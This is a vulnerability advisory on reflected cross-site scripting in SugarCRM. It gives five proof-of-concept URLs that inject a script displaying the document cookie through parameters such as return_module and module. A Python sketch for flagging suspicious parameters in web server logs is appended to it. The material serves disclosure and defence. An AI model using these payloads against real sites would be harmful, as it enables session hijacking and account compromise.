SugarCRM Multiple Cross-Site Scripting Vulnerability

The following examples were provided:

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index

http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>

http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>
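
For triage of web server logs, the following added example (not part of the original advisory or of SugarCRM) parses request URLs like the ones above and reports which query parameter carries characters that can break out of an HTML attribute or tag. The function names, the character set and the decode bound are assumptions made for this sketch; the last sample URL is constructed as a benign baseline.

```python
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Characters that let a reflected value break out of an HTML attribute or tag.
# This set is an assumption chosen for log triage, not a complete XSS filter.
BREAKOUT_CHARS = set("\"'<>")
MAX_DECODE_ROUNDS = 3  # bound on repeated decoding of multiply-encoded input


def fully_decode(value):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url):
    """Return {param_name: sorted breakout chars found} for one request URL."""
    findings = {}
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = BREAKOUT_CHARS & set(fully_decode(name) + fully_decode(value))
        if hits:
            findings[name] = sorted(hits)
    return findings


# The first three request URLs are taken from the advisory above.
SAMPLES = [
    'http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index',
    "http://www.example.com/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search",
    "http://www.example.com/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]\"><script>alert(document.cookie)</script>",
    # Constructed benign request for comparison.
    "http://www.example.com/sugarcrm/index.php?module=Contacts&action=EditView&return_module=Contacts&return_action=index",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(suspicious_params(url))
```

The output names the affected parameter for each request (`return_module`, `name`, `module` and `record`), which are the request values that need output encoding before being reflected into the page.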


 

Copyright 2010, SecurityFocus